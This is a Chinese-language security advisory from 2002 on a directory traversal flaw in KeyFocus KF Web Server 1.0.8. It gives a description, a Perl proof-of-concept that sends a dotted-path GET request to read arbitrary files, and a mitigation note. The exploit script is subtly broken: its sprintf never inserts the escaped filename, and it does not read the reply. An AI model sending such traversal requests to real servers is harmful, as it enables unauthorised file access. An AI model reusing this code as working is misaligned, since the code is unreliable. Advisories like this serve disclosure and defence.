KeyFocus KF Web Server远程目录遍历漏洞发布时间:2002-11-22 更新时间:2002-11-22 严重程度:中 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:6180 受影响系统 Key Focus KF Web Server 1.0.8详细描述 KeyFocus KF Web Server实现上存在漏洞,对处理连续的点字符请求不正确,远程入侵者可能利用这个问题逃出Web主目录读取任意系统文件,但只有服务器程序识别的MIME类型文件才能被正确访问到。 测试代码 #!/usr/bin/perl use URI::Escape; use IO::Socket; if (@ARGV < 2) { print STDOUT "Usage: perl $0 [filename] [host] [port]"; } else { $f = IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp"); $url = uri_escape($ARGV[0]); $exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n"); print $f $exploit; undef $f; } 解决方案 目前厂商还未提供补丁,厂商承诺会在2.0.0 beta的软件中修补。由此漏洞只影响特定的MIME类型文件,所以尽量减少服务器支持的MIME类型可以降低风险。 相关信息 mattmurphy@kc.rr.com <mattmurphy@kc.rr.com> |
